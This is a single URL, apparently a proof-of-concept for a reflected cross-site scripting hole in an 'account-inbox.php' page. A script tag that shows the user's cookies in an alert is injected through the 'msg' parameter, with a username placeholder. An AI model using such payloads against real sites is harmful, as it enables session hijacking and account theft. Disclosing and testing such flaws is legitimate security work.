http://www.example.com/account-inbox.php?msg=<script>alert(document.co­okie)</script>&receiver=<username>